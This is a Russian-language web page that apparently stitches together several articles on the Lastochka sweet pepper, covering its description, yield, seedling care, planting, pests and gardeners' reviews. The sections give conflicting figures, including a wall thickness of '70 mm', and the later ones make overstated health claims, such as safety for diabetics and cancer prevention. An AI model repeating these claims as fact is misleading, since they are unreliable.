0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какие достоинства и недостатки у перца ласточка

Перец Ласточка

В 70-х годах прошлого века в СССР был выведен новый сорт сладкого перца, имеющий много положительных качеств. Перец Ласточка известен благодаря приятному, сладкому вкусу, универсальности, а также устойчивости к некоторым болезням. Этот материал посвящен описанию сорта Ласточка, особенностям его выращивания, обработки.

Описание сорта Ласточка

Перец Ласточка – это раннеспелый сорт, для полного созревания плодам необходимо 100-130 дней в зависимости от места выращивании и метода посадки (семена, рассада). Плодоносит не долго – в течение 1-2 недель. Куст небольшой, растет компактно до 45-60 см в высоту. Урожайность с каждого метра квадратного 3,5-4,7 кг, если выращивать перец в открытом грунте. При посадке в теплицах число увеличивается до 7-10 кг/м. кв.

Описание сорта Ласточка

Плоды у перца сорта Ласточка имеют форму конуса, кончик заострен, как крылышко ласточки. Вес одного перца может достигать 100 г, но чаще 70-85 г, а длина в среднем до 10 см. Кожица глянцевая. Цвет кожуры в фазе технической спелости салатовый, но затем становится красным. Может быть насыщенного или светлого оттенка в зависимости от длительности созревания. Плоды перца мясистые, толщина стенки достигает 5-5,5 мм, отдельные экземпляры имеют стенки толщиной 6,1-7,1 мм.

Какие достоинства и недостатки у перца Ласточка?

После появления сорта о нем можно было услышать лишь положительные отзывы. Ниже приведен список достоинств вида.

  • Быстро приспосабливается к разным климатическим условиям. Перец сорта Ласточка устойчив к жаре, холоду, перепадам температур.
  • Скороспелость сорта Ласточка позволяет рано собирать урожай. Для полного созревания необходимо в среднем 100 суток.
  • Кусты растут до 0,5 метра, поэтому в серьезной, кропотливой подвязке не нуждаются, а это упрощает уход.

Плотность стенки позволяет без трудностей транспортировать урожай на большие расстояния

Теперь о недостатках перца сорта Ласточка. Хоть любители сорта отмечают его практичность и простоту использования, но есть ряд негативных моментов, которые останавливают немалую долю огородников от возделывания перца Ласточка.

  • Большая конкуренция. Да, сорт действительно хороший, но сегодня существует массы гибридных сортовых типов сладкого перца дающих большие урожаи, массивные, вкусные плоды – «Атлант F1», «Богатырь», «Изабелла F1», «Абрикосовая фаворитка» и т. д. Таким образом, высокая конкуренция отодвинула сорт на средние позиции.
  • Посадка семян должна осуществляться на 3-4 см вглубь земли. Корневая система у этого сорта поверхностная, а при пересадке на постоянное место корневую шейку заглублять нельзя. Если посадить семена неглубоко, то растение будет хилое, да и прополку будет трудно осуществить.

Нужно ли делать рассаду?

Высаживается перец Ласточка в открытый грунт или в теплицу обычно рассадой. Посадка семенами возможна только в самых южных регионах, но даже при этом культура будет дольше расти, чем при выращивании рассадным методом.

Рассаду готовят с конца февраля. Она должна быть сильной, закаленной, иметь 4-5 листочков перед пересадкой на постоянное место.

Для подготовки рассады перца Ласточка подходят семена, купленные в магазине или собранные собственноручно. Перед посадкой их замачивают в растворе марганцовки или золы, чтобы обеззаразить и насытить полезными веществами. Сажать семена стоит сразу же в торфяные или любые другие горшочки, чтобы не пикировать хрупкие ростки и не рисковать их слабыми корешками, но в принципе для начала можно посеять их и в один общий ящик.

Рассаду готовят с конца февраля. Она должна быть сильной, закаленной, иметь 4-5 листочков перед пересадкой на постоянное место

После появления ростков необходимо обеспечить им правильный уход. Для этого стоит регулярно поливать растения, осматривать, чтобы если что, вовремя заметить признаки болезней или вредителей. Пикировка перца проводится в период фазы семядолей. После пикирования ростков в отдельные горшочки землю в каждом из них стоит рыхлить после каждого полива. Для этого можно использовать старую вилку, карандаш – любой мелкий и не очень острый предмет.

За 1-2 недели до посадки необходимо закалить ростки, вынося их время от времени на улицу или же просто открывая окно.

Как выращивать перец Ласточка?

Выращивают сорт перца Ласточка в тепличных условиях и в открытом грунте. Но, разумеется, наибольшие урожаи собираются именно в теплицах, хотя выращивание в открытом грунте проще. В открытый грунт сажают рассаду с конца мая, в теплицу, тем более, если она отапливаемая, можно сажать ростки с середины апреля, но только при условии, что они достаточно окрепли!

Выращивают перец сорта Ласточка в теплице и в открытом грунте

Перед посадкой землю стоит удобрить, если она плохого качества. Если нет времени удобрять почву, можно просто в каждую лунку засыпать смесь удобрений (1-2 ст. ложки нитрофоски или 1/3 часть золы с половиной лопаты перегноя). Схема посадки перца Ласточка – 40х60 см. После посадки ростки необходимо полить и оставить для укоренения. Совсем недавно мы подробно описали — чем подкармливать рассаду перца после пикировки.

Уход подразумевает своевременный полив и последующее рыхление грунта, обработку кустов от болезней, вредителей (если таковых еще нет, можно провести профилактическую обработку комплексными препаратами «Заслон», «Барьер», «Фундазол», «Стрела», «Алатар» и др.). Также на протяжении сезона стоит до 3 раз проводить подкормку перца органическими и минеральными удобрениями.

Советы опытных огородников

Для упрощения ухода за перцем сорта Ласточка и хранения урожая можно воспользоваться простыми советами.

  • Чтобы кусты быстрее развивались и дали плоды, их нужно формировать. Для этого по мере роста удаляются все боковые побеги и листья до первой развилки.
  • Хранить перец можно в холодильнике, не обрабатывая до 15-30 дней. Для более длительного хранения его замораживают.
  • Если земля питательная, а вредителей или болезней нет, можно просто посыпать землю вокруг перца золой на протяжении всего сезона. Она не только является природным удобрением, но также оказывает профилактическое воздействие от инфекций, бактерий, спор грибов, вредных насекомых.

Перец Ласточка может употребляться в свежем виде, для приготовления салатов, закусок или перерабатываться. Из него можно готовить разные блюда, фаршировать, запекать, жарить, варить и т. д. Кулинары разных стран также рекомендует его консервировать.

Перец Ласточка: надёжный сорт промышленного назначения

Ласточка — один из самых популярных сортов сладкого перца. Несмотря на то что он известен уже почти полвека, его каждый год сажают и сажают огородники во многих регионах нашей страны. Это обусловлено как высоким качеством плодов, так и неприхотливостью к условиям выращивания.

Описание перца сорта Ласточка

В Госреестре РФ перец Ласточка получил «прописку» под №2, когда в списке значился лишь Подарок Молдовы. Произошло это в 1974 году после того, как выведенный в Молдавском НИИ земледелия и овощеводства сорт прошёл всесторонние испытания. С тех пор этот перец успешно выращивается как на личных огородах, так и в крупных сельскохозяйственных предприятиях.

Внешний вид

Перец Ласточка растёт в виде полураскидистого куста высотой 50–60 см штамбовидной формы. В случае солидного урожая требуется подвязывание побегов к кольям. Плоды на кустах занимают висячее положение. Они имеют конусовидную форму, гладкие, выше средней величины: длиной до 10 см, масса колеблется от 50 до 80 г, отдельные экземпляры вырастают до 100 г. Поскольку самый кончик плода часто немного загнут и напоминает клюв Ласточки, сорт и получил, по-видимому, своё название.

В состоянии технической спелости окраска перчиков салатовая, в биологической — красная. В промежуточный период окраска — от жёлтой до оранжевой. Именно в биологической спелости должны находиться на кустах перчики, чтобы из них можно было собрать семена для посева в будущем году. Плоды считаются толстостенными: стенки, в зависимости от состояния спелости, имеют толщину от 5 до 7 мм.

Перец сорта Ласточка имеет классическую форму и приятную окраску

Характеристика перца Ласточка

Перец Ласточка относится к группе среднеранних сортов. Перчики в стадии технической спелости можно собирать через 106–130 дней после появления полных всходов, ещё около месяца требуется для того, чтобы они достигли стадии биологической спелости. Перец употребляют и в той, и в другой стадии созревания. При этом собранные зелёными плоды способны в некоторой степени дозревать при хранении. Основная часть урожая созревает дружно, в дальнейшем наблюдается скудное плодоношение.

Вкус плодов перца Ласточка различными дегустаторами признаётся как хороший или отличный. Их мякоть сочная и сладкая. Урожай используют как в свежем виде, так и для различных блюд. При создании сорта было оговорено, что он предназначен для консервной промышленности. Поскольку кожица плотная, урожай легко переносит перевозку на любые расстояния, хорошо хранится.

Урожайность перца Ласточка средняя, составляет от 2,5 до 4,7 кг/м 2 . В теплицах урожай может быть несколько выше, но на открытом воздухе растения реже болеют. В целом же устойчивость этого сорта к болезням находится на среднем уровне. Сорт считается неприхотливым, легко переносит резкие изменения в состоянии погоды.

Для каких регионов подходит сорт

Список регионов, в которых перец Ласточка допущен для культивирования, обширен. По сути дела, по какой-то причине Госреестр РФ не включил в этот список лишь Центральный регион. Остальные же края и области, как из европейской части России, так и всё Зауралье, фигурируют в списке. Возможно, этот недопуск был связан и с какими-то вескими причинами, догадаться о них сложно, но реально этот перец выращивают повсеместно. Сорт выведен специально для крупных предприятий, то есть для товарного производства, но его с успехом выращивают и обычные дачники. При этом, в зависимости от климата, предпочтение отдаётся открытому или защищённому грунту. Примерный ориентир — широты Саратова или Курска: южнее нет смысла занимать Ласточкой теплицы, севернее — рискованно высаживать перец в открытый грунт.

Видео: перец Ласточка в Якутии

Достоинства и недостатки

Если бы перец Ласточка не представлял собой достойного конкурента сотням современных сортов и гибридов, он бы ушёл в небытие. Однако оказывается, что подавляющее большинство новых разработок направлено на удовлетворение интересов мелких фермеров и владельцев небольших личных подсобных хозяйств, в том числе обычных дачников. Сорта, предназначенные для товарного производства продукции, появляются всё реже и реже. Поэтому преимущества сорта Ласточка следует рассматривать, в том числе, и с учётом этой ситуации. Сорт обладает массой достоинств и некоторыми неочевидными недостатками.

Таблица — достоинства и недостатки перца Ласточка

Плюсы Минусы
Неприхотливость к условиям выращивания Не самая высокая урожайность
Дружная отдача урожая Необходимость подвязывания кустов
Раннеспелость
Хорошая транспортабельность и сохранность плодов
Адаптивность к изменениям в погоде
Высокие вкусовые качества
Универсальность использования урожая
Способность к дозариванию плодов, снятых
в стадии технической спелости

Удивительно, но за столько лет существования сорта у него почти не появилось серьёзной замены с точки зрения промышленного выращивания перцев. Среднеранних сортов, рекомендованных для промышленного возделывания, в списках Госреестра насчитывается лишь около десятка. При этом, например, довольно старый сорт Белозёрка районирован лишь в паре тёплых регионов и характеризуется очень низкой урожайностью. У сравнительно нового венгерского гибрида Бибиц урожайность неплоха, но он допущен к выращиванию только в Северо-Кавказском и Нижневолжском регионах. Совсем не блещет характеристиками и старый сорт Виктория.

Ласточку часто сравнивают с Белозёркой, но у последней жёстко ограничены регионы допуска

Сортов или гибридов, рекомендованных для промышленного выращивания в большинстве регионов нашей страны, практически вообще не существует, а если говорить о раннеспелых или среднеранних, то, кроме Ласточки, в списках вообще не значится ни одного. Этот серьёзный перекос в сторону селекции сортов для мелких хозяйств, наверное, имеет объяснение, но суть остаётся понятной: старая добрая Ласточка и сейчас представляется универсальным сортом сладкого перца для крупных сельскохозяйственных предприятий.

Рекомендации по выращиванию сорта

Перец Ласточка в самых южных регионах можно вырастить и без рассады, но тогда он не будет иметь никаких преимуществ с точки зрения раннеспелости: урожай будет готов лишь к концу лета. Поэтому практически всегда и везде сначала готовят рассаду. Рассаде этого перца при высадке в грядку должно быть 70–75 дней, да пара недель уйдёт на то, чтобы семена взошли. Поэтому посев семян в горшочки для тепличного выращивания проводят в середине или конце февраля, а для открытого грунта — в первой половине марта.

Нет большого смысла в посеве семян в общую ёмкость и последующем пикировании сеянцев: перцы не приветствуют эту процедуру. Лучше сразу посеять семена в индивидуальные стаканчики с выдвижным дном или торфяные горшочки вместимостью 250–300 мл. Уход за рассадой этого перца не имеет особенностей. К моменту высадки (середина мая в теплицу или начало лета в незащищённый грунт) на ней уже должны быть бутоны, а лучше несколько цветков. За неделю до высадки в грядку рассаду обязательно начинают приучать к свежему воздуху. Если не пришло настоящее тепло, рассаду высаживают под временные укрытия.

Как и у любого раннеспелого сорта, рассада Ласточки к моменту высадки в грядку должна зацвести

Оптимальная схема посадки для перца Ласточка 40 х 60 см; более уплотнённый вариант чреват заболеваниями, поскольку растения будут плохо проветриваться. Колышки для подвязывания кустов лучше вбить сразу, хотя сама подвязка потребуется позже, при образовании и росте плодов. Поливают и подкармливают этот перец так же, как и большинство других сортов. Почва никогда не должна пересыхать, поливы проводят только тёплой водой. Подкормки дают каждые 2–3 недели. Можно использовать как разбавленные настои коровяка, так и растворы минеральных удобрений. С момента покраснения первых плодов азот в подкормках стараются не давать.

Особых требований к формированию куста нет: удаляют все веточки и листья ниже первой развилки. Принято удалять и самый первый цветок, образующийся у этой развилки. Первые перчики надо собрать сразу, как только они будут пригодны в пищу: это облегчает рост и созревание оставшихся. Основную часть урожая Ласточка выдаёт довольно дружно, но затем продолжает потихоньку плодоносить до самых холодов. Тем не менее цветки, появляющиеся в августе, стоит удалять: навряд ли из них успеют развиться полноценные плоды.

При формировании куста стараются повысить его разветвлённость

Отзывы о перце сорта Ласточка

Росло 3 куста в 2012 году в ОГ, первый месяц под плёнкой. Лето было хорошим и перец тоже! Кусты были усыпаны перцами, аж ветки ломались, очень урожайный! Семена от фирмы Флос, плоды небольшие конусовидные 70–100 грамм, в технической спелости светло-зелёные, уже вполне съедобные, спелые-красные. Стенка средней толщины, вкус обычный перечный. В сезон такие перцы на рынке стОят совсем недорого, но тем, кто постоянно живёт на даче и рынок далеко, желательно сажать и такие сорта для раннего потребления. Поспевать начал в первой декаде августа (а объедали с куста зелёные гораздо раньше).

Светик, Москва

http://www.tomat-pomidor.com/forums/topic/1434-%D0%BB%D0%B0%D1%81%D1%82%D0%BE%D1%87%D0%BA%D0%B0/

Мне тоже очень нравится Ласточка. Идеальна для фаршировки. Стеночки средней толщины, плод напоминает клюв ласточки, треугольничек такой.

Ольга

http://www.tomat-pomidor.com/forums/topic/1434-%D0%BB%D0%B0%D1%81%D1%82%D0%BE%D1%87%D0%BA%D0%B0/

Винни-Пух, Ласточка довольно старые сорта перца (шкурка тонкая) и не очень урожайные, если земли много, то можно и данные сорта выращивать, но если места мало, то лучше перейти на более урожайные, с толстыми стенками сорта перцев.

Лидия

http://forum.prihoz.ru/viewtopic.php?t=7122&start=345

Помимо салата, «Ласточка» хорошо подходит для супов и гуляша, где необходим перечный аромат без острого вкуса. А можно есть просто вприкуску вместо чипсов.

Ландерс

https://irecommend.ru/content/lastochka-moya-ili-besproblemnyi-sort-sladkogo-pertsa-ot-posadki-do-urozhaya

Хороший сорт для открытого грунта. Я высаживаю Ласточку и Белозёрку. Ласточка более урожайна, куст к августу буквально весь усыпан плодами. Стенка у перцев толстая, примерно 6 мм.

Дарьяна

http://www.bolshoyvopros.ru/questions/2363574-perec—lastochka-kto-sazhal-otzyvy.html

Перец Ласточка — один из основных сортов, предназначенных для товарного производства, то есть для выращивания в крупных объёмах. Тем не менее его сажают и обычные дачники, поскольку это очень надёжный сорт среднераннего срока созревания, плодоносящий вкусными перчиками универсального назначения.

За что дачники любят перец «Ласточка»: характеристика и описание сорта, его плюсы и минусы

Изобилие сортов овощной рассады на прилавках рынков – это прекрасно. Но выбрать культуру, которая принесет богатый урожай, быстро адаптируется к окружающей среде и не заболеет – непросто. Статья поможет решить проблему в выборе такой овощной культуры, как болгарский перец.

Предлагаем вашему вниманию сорт Ласточка — в чем преимущество, как выращивать, какова урожайность, расскажет эта статья.

Что это за сорт перца

Один из представителей семейства пасленовых – сладкий перец. Над улучшением его качественных характеристик работают многие селекционеры. Есть сорта перца, которые были выведены много лет назад, еще в СССР, но по сей день пользуются спросом у огородников.

Ласточка как раз из их числа. Сорт внесен в Госреестр растений еще в 1974 году. Имеет улучшенные показатели роста, устойчив к болезням, показывает отличную урожайность. Выведен молдавскими селекционерами.

Характеристика и описание сорта

Сорт сладкого перца Ласточка высаживают на открытой почве во многих районах России: от Центрально-Черноземного до Зауралья. Ласточку селекционировали для пищевого промышленного производства. Но она с успехом выращивается дачниками на приусадебных участках.

Сорт Ласточка дает плоды красного цвета. Именно такие перцы лидируют по содержанию витамина С. В 100 г этого сорта содержится его суточная норма для человека.

Калорийность сладкого болгарского перца всего 26 ккал, поэтому его с удовольствием включают в рацион люди, следящие за своим весом.

Основные показатели сорта:

  • небольшой куст с одиночным стволом высотой около 65 см, каскадной формы;
  • при большом количестве плодов кусты подвязывают к опоре, чтобы избежать повреждения;
  • среднеранний срок созревания, спеет на третий-четвертый месяц с момента высадки в грунт;
  • урожайность – до 5 кг с 1 м2;
  • используется для домашних нужд и в промышленных масштабах;
  • хорошо переносит перепады температуры воздуха, не требует особого ухода.

Отличительные черты

Ласточка отличается от своих родителей-предшественников несколькими показателями:

Характеристика плодов, урожайность

Перец Ласточка получил такое название благодаря форме плодов. У основания овощ конусообразный, напоминающий клюв ласточки.

Форма плодов хорошо видна на фото.

Основные характеристики такие:

  • плоды крупные, мясистые, длиной до 10 см, толщина стенок может достигать 7 мм;
  • форма перчика конусовидная, кожура гладкая;
  • вес плода примерно 85 г, вырастают и более крупные овощи – до 100 г;
  • спелый перец окрашен в ярко-красный цвет, технически спелый овощ – ярко-салатового цвета, между периодами созревания проходит 20–30 дней;
  • вкус сладковатый, с кислинкой и слегка уловимой горчинкой.

Урожайность сорта высокая. Если правильно ухаживать за культурой, то можно получить – до 6 кг с 1 м2. Плоды созревают почти одновременно.

Подготовка к выращиванию

В открытый грунт высевать семена перца Ласточка целесообразно только в южных регионах. В северных районах страны культура выращивается рассадным методом. Семена на рассаду высеваются за два месяца до высадки саженцев в открытую почву.

Сажают семена в последнюю неделю февраля – первую декаду марта. Перец Ласточка выращивают как в открытом грунте, так и в теплицах. Рассаду на постоянное место высаживают в конце мая, в теплицу – в третьей декаде апреля.

Внимание! Так как семена перца всходят дольше, чем помидоры и огурцы, учитывайте сроки посадки семян.

Подготовка семян для посева

Купленные в специализированных садовых магазинах семена не обрабатывают, это делает производитель. Если посадочный материал был собран из прошлого урожая, то первым делом нужно отобрать пригодные семечки и провести их активацию:

  • отбираю целые, однородные семена, без повреждений и дефектов;
  • обеззараживание производят раствором марганца 1% или химикатами, предназначенными для борьбы с грибками (замачивают семена на 20 минут, затем их промывают);
  • чтобы ускорить прорастание, замачивают зерна в стимуляторах роста («Эпин-экстар», «Корневин», «Гумат натрия», «Циркон», «Силк»);
  • проращивают семена на вате, смоченной водой (для удобства применяют ватные диски), емкость покрывают полиэтиленовой пленкой или пакетом и следят, чтобы вата постоянно была влажной;
  • проветривают семенной материал несколько раз в день – пленку снимают и надевают обратно на тару.

Выращивание рассады

Когда семена на ватных дисках начинают прорастать, их высаживают в грунт, обработанный горячим паром. Это делается, чтобы уничтожить вредоносные бактерии, грибки, водоросли, нематоды. Землю для посадки перца готовят самостоятельно – смешивают в одинаковых частях дерн, речной песок, опилки. Можно приобрести уже готовый грунт, тогда проводить предварительную обработку почвы нет необходимости.

Есть еще один вариант посева семян перца – в торфяные таблетки или сразу в отдельные стаканчики, наполненные почвой. Этот способ позволит избежать травмирующей молодые всходы процедуры – пикировки.

Когда кустики подрастут, их высаживают в грунт вместе с таблетками или из стаканчиков с комом земли, где разместились корни. Такой вариант получения рассады поможет растениям быстро укорениться на новом месте и ускорит созревание плодов.

Посадка перца

Пошаговая инструкция посева семян выглядит так:

  1. Семена размещают в общую тару на глубину 1,5 см с расстоянием 2 см друг от друга.
  2. При посадке в отдельные емкости проросшие семена выкладывают по одному в каждую таблетку или стаканчик. Те, которые не проросли, сеют по две штуки. После всходов лишнее растение аккуратно обрезают, а не выдергивают.
  3. Когда в общем ящике из семян вырастут по два-три листочка, растения пикируют – пересаживают в емкости с ячейками или в стаканчики, (объем не должен быть меньше 0,5 л), стараясь не повредить корневую систему.
  4. Объем каждого стаканчика не должен быть меньше 0,5 л – корни сладкого перца любят свободу.

Дальнейший уход

Чтобы получить здоровую крепкую рассаду, посадкам необходимо создать условия.

Растению нужен солнечный свет не менее 12 часов в сутки. Если его не хватает, то используют фитолампы. Теплолюбивому овощу рекомендуется температурный режим: днем +25°C, ночью не ниже +20°C.

Внимание! Теплолюбивый сорт прекращает рост, если температура воздуха ниже +13°C.

Не допускайте пересыхания почвы. Поливают рассаду отстоянной теплой водой.

Подкармливают саженцы Ласточки два раза. Используют минеральные удобрения, не содержащие хлор. Подкормку совмещают с поливом.

Перед высадкой рассаду перца закаливают, периодически помещают на открытый воздух, постепенно увеличивая время пребывания. Рассада, которая прошла процедуру закаливания, укореняется быстрее.

Особенности выращивания сорта и возможные трудности

Перец – теплолюбивое растение. В тех регионах, где климат прохладный, его накрывают пленкой, чтобы растущая культура не расходовала энергию на борьбу со стрессовыми температурами.

Недостаток воды сказывается на количестве урожая – плоды вырастают небольших размеров, не соответствуют сортовым показателям. Большое количество влаги препятствует впитыванию удобрений, что тоже влияет на урожайность. В засушливый сезон перец поливают регулярно, как только верхний участок земли высохнет на несколько сантиметров в глубину. Орошают культуру из лейки, стараясь, чтобы вода не попала на листья.

Каждые две недели перец подкармливают минеральными удобрениями. Азотные применяют с осторожностью, чтобы овощи не наращивали листья вместо плодов. Начинают подкормку недели через две после высадки на грядки, когда растение еще не зацвело. Подкармливают культуру, чередуя органические удобрения с неорганическими.

Важно. Для сохранения влаги, которая в жару не дает перцу перегреваться, а в холод – переохлаждаться, проводят мульчирование грунта. Удаляют сорную траву, рыхлят почву.

Характерные болезни и вредители

Болеет перец Ласточка теми же болезнями, что и другие овощи рода пасленовых: фитофторой, черной ножкой, фузариозом, столбуром. Вредители, наносящие большой урон культуре: личинки майского жука, белокрылка, тля, клещ паутинный.

Методы борьбы с насекомыми применяют как промышленные, так и народные: опрыскивают фунгицидами «Фитоверм», «Актеллик», «Карбофос» или используют отвары из луковой шелухи, соцветий одуванчиков, чеснока.

Преимущества и недостатки сорта

У перца Ласточка есть много преимуществ перед другими сортами. Благодаря этим качествам он широко применяется огородниками и дачниками на приусадебных участках:

  • лидирует по количеству собранного урожая;
  • адаптирован к первым заморозкам в летнее и осеннее время;
  • семена для посадки используют с собственного огорода;
  • мясистый плод, имеющий приятный вкус.

Плоды употребляют в пищу в свежем виде, делают салаты, консервируют.

Из недостатков отмечают подверженность сорта типичным для овощей семейства пасленовых болезни и вредителей. В регионах с неустойчивым климатом сорт Ласточка выращивают только тепличных условиях.

Отзывы

Сорт, имеющий более чем 50-летнюю историю выращивания, может похвастаться только положительными отзывами. Его выбирают как опытные огородники, так и только начинающие осваивать садовые премудрости.

Анна, г. Воронеж: «Выращиваю Ласточку давно. Он долго хранится, имеет отличный вкус. Уход не требует много времени. Главное – поливать регулярно и вовремя отщипывать лишние листики. Плоды крупные. Рекомендую для огородников, не имеющих опыта возделывания овощных культур».

Сергей, пос. Александровка: «Урожайность отличная! Вкус выраженный, плоды мясистые, граммов по 80. Понравилось то, что ухаживать за Ласточкой пришлось только в первое время, когда были заморозки на почве. Для тех, кто постоянно занимается выращиванием овощных культур, перец этого сорта просто незаменим».

Светлана, г. Мценск: «Ласточка – сорт, который я советую всем любителям перца. От него немного хлопот, зато преимуществ хватает: вкусный, сочный овощ. Ростки всходят одновременно, дружно. Подкармливаю коровяком – растет перец замечательно. Урожай собираю богатый. Вся семья любит салаты, лечо, зимние заготовки из Ласточки».

Заключение

Все характеристики перца Ласточка говорят о том, что сорт не требует особых условий для выращивания, устойчив ко многим болезням, изменениям погоды, хорошо сохраняется. Сладкий перец имеет улучшенные показатели роста, высокую урожайность. Факт, что эта культура выращивается уже более полувека, говорит о том, что Ласточка – лучший сорт перца. Попробуйте вырастить плоды оригинальной формы у себя на огороде. Судя по отзывам огородников, вы не пожалеете о выборе!

Характеристика, описание и особенности выращивания перца Ласточка

Время на чтение: 9 минут

Сорт перца Ласточка был создан специально для любителей сладких разновидностей этой культуры. Эти плоды отлично подойдут для фаршировки. Среднеранний гибрид можно отнести к промежуточному виду между ранними мелкими перцами и поздними с крупными разновидностями. Непосредственно сорт прославился стабильным урожаем. На растениях все время появляется множество плодов.

О происхождении перца Ласточка

Гибрид сладкого перца Ласточка был создан в Молдове Сельскохозяйственным Приднестровским институтом. Заявка на регистрацию в реестр сорта была подана в 1970 г. Через 5 лет, когда было закончено испытание сорта, Ласточке придали статус достижения селекции, при этом он был районирован во всех регионах Российской Федерации, за исключением Центрального. Сладкий перец Ласточка был подробно описан в Государственном реестре растений России.

Описание и характеристика сорта

Время созревания и урожайность сладкого перца Ласточка будет зависеть от агротехнических условий и места выращивания, и составляет приблизительно 105-135 суток. Через это время после появления всходов можно собрать урожай для консервирования либо применения в кулинарии. Но техническая спелость – окрашивание и созревание семечек в плодах происходит на 138-168 день.

Высота растения небольшая, составляет приблизительно 49-62 см. Перчики висячие, в форме конуса, округлой формы. Поверхность кожуры гладкая, имеет глянцевое покрытие, в биологической зрелости приобретает зеленоватый оттенок. Толщина кожуры составляет около 5,3-5,6. мм, при созревании – 6,2-7,2 мм. Масса перца, с учетом Государственного реестра – 54-85 г.

Сладкий перец Ласточку можно высаживать на открытых грядках и в тепличных условиях. Урожай на дачных участках составляет приблизительно 2,6-5,8 кг/м.кв. При этом на 1 м2 советуют выращивать не больше 5 кустиков.

Предназначение сладкого перца универсальное, имеет великолепный вкус, традиционный для этой огородной культуры. Помимо этого, гибрид отлично перевозится на дальние расстояния, имеет хорошую лежкость, можно использовать для машинной уборки, это дополнительно сделало его коммерческим видом.

Основные достоинства и недостатки

Ласточка, как и другие разновидности сладкого перца, содержит множество полезных макро- и микроэлементов, которые оказывают положительное воздействие на организм человека. Овощ укрепляет иммунитет, снижает уязвимость к респираторным инфекциям.

Полезные элементы, которые придают продукту ценность, несут в себе множество антиоксидантов, витаминов, капсаицинов и алкалоидов. Кроме вышеперечисленного болгарский сладкий перец имеет в своем составе много каротина и аскорбиновой кислоты, это нормализует кровяное давление и работу пищеварительной системы.

Сладкий перец препятствует появлению тромбов, повышает аппетит и положительно влияет на общее самочувствие. Одна перчинка содержит в себе дневной запас витамина C, который требуется для взрослого человека.

Хотя плоды и характеризуются сладким вкусом, при сахарном диабете их можно смело принимать в пищу. В этом сорте отсутствует сахароза, но находится другое вещество – фруктоза. Витамин A улучшает состояние волосяного покрова и кожи. Определенные витамины предотвращают злокачественные новообразования.

Но есть и негативные моменты. Пациентам, которые страдают ишемическими болезнями и нарушениями ритма сердцебиения, увеличенной кислотностью и геморроем, печеночными и почечными патологиями, принимать этот продукт в пищу нужно осторожно.

Специфика выращивания культуры

Чтобы получить урожай сладкого перца, надо соблюдать определенные рекомендации по выращиванию и агротехнике.

Можно выделить правила:

  • Выращивание саженцев на закрытом грунте или под пленкой.
  • Подготовка посадочного материала.
  • Выполнение пикировки, закалка саженцев, регулярные прикормки.
  • Своевременный полив.

Особенности сладкого перца Ласточка: его характеристика и правила выращивания

Сладкий перец сорта Ласточка считается нетребовательным в уходе и высокоурожайным. Фермеры любят растение за его способность приспосабливаться к любым климатическим условиям и резкой смене погоды. Плотная кожица дает возможность хранить урожай длительное время. Одновременное созревание плодов позволяется осуществлять однократную уборку урожая.

История сорта перца Ласточка

Родина – Молдова. Заводчики – ученые Приднестровского института сельского хозяйства. В 1970 году селекционеры подали заявку на регистрацию данного сорта в государственном реестре. В 1974 году – стандарт растения утвердили, и допустили к выращиванию по всей территории России, кроме Центрального района.

На данный момент за сохранность растения ответственны многочисленные компании, занимающиеся селекционными работами в РФ. Спустя некоторое время селекционеры создали еще один сорт перца – Золотистую ласточку. И хоть названием растения схожи, да и ученый один, все равно характеристики и продуктивность отличаются.

Ласточка на сегодняшний день пользуется огромной популярностью среди фермеров, некоторые даже предполагают, что такое название растение получило из-за удивительной формы плодов – в виде клюва ласточки.

Описание и характеристики перца

Особенность перца Ласточка – возможность выращивания при любых климатических условиях. Можно посадить растение в теплице, а можно в открытом грунте.

Ученые доказывают, что Ласточка – полезный сорт, в нем содержится огромное количество питательных, необходимых организму элементов. Важную роль играют витамины В и С. Продукт отличается невысокой калорийностью: в 100 г – 43 ккал. Перец приводит в норму ЖКТ и налаживает работу сердечно-сосудистой системы.

В высоту растение достигает 0,7 м. На 1 перце формируется примерно 10 больших стручков. Растения облиственные, нуждаются в подвязке. Листья большие, насыщенно-зеленого оттенка, на поверхности находятся морщинки.

Перец Ласточка очень быстро созревает, техническая зрелость наступает спустя 110 дней.

Описание плодов

Главные признаки стручков перца Ласточки:

  • в виде конуса, отдельные экземпляры в форме овала;
  • во время технической зрелости цвет светло-зеленый, во время биологической – красный;
  • стенки толщиной – 70 мм;
  • масса стручка от 60 до 110 г;
  • кожура не толстая, поверхность гладкая;
  • длина плода 0,1 м.

Урожайность

Сладкий перец сорта Ласточка отличается высокой урожайностью, за это он и ценится у фермеров. С 1 кв. м можно собрать примерно 6-7 кг плодов.

Подходящий регион и климат

Сладкий перец сам по себе очень теплолюбивый, поэтому лучше выращивать его на южной территории. Для северных регионов он также подходит, но только для выращивания в теплицах.

Для хорошего развития растению необходима температура +21…+26 градусов по Цельсию, ночью она не должна опускаться ниже +17…+20 градусов. Температура грунта не менее +19 градусов. При более низких показателях падает урожайность, вянут листья, и в результате Ласточка погибает. Засуха и высокая температура выше +34 градусов также негативно сказывается на растении.

Чтобы перец быстрее начал плодоносить и урожай был стабильным необходимо поддерживать световой день не менее 13 часов. Для выращивания рассады в марте используют специальные дополнительные лампы.

Достоинства и недостатки

Сорт перца Ласточка, как и другие разновидности культуры, имеет как плюсы, так и минусы, и их необходимо учитывать при выращивании растения.

Преимущества перца Ласточка:

  • большое количество полезных микроэлементов, продукт подходит даже диабетикам;
  • может расти в любом климатическом поясе, главное правильно подобрать место для посадки;
  • высокоурожайный;
  • имеет декоративный внешний вид;
  • можно использовать не только в свежем виде, но и в консервации.
  • слишком высокий, необходимо устанавливать опоры;
  • требователен к составу грунта;
  • вырастить на открытой почве можно, но очень сложно.

Особенности посадки

Получить богатый урожай можно только при правильной посадке растения. Выделяют несколько основных этапов, которые имеют свои особенности и нюансы.

Подготовка семян

Самое основное – вовремя посеять зёрна перца Ласточка. Если опоздать, то растение начнет позже развиваться, соответственно не принесет того урожая, которое должно. Ростки проклюнутся лишь спустя 2 месяца, поэтому посев семян осуществляйте в середине февраля. Если саженцы будете высаживать сразу в открытую почву, то лучше высеивать посадочный материал в начале марта.

Чтобы обеспечить высокий процент всхожести следует правильно отобрать семена. Сначала внимательно осмотрите их, плохие выбросьте, а хорошие оставьте. В емкость с водой добавьте 1 ст. л. соли и поместите в раствор все семена. В такой смеси подержите посевной материал примерно четверть часа, все зёрна, которые всплыли наверх – выбросите. Они низкого качества и не взойдут.

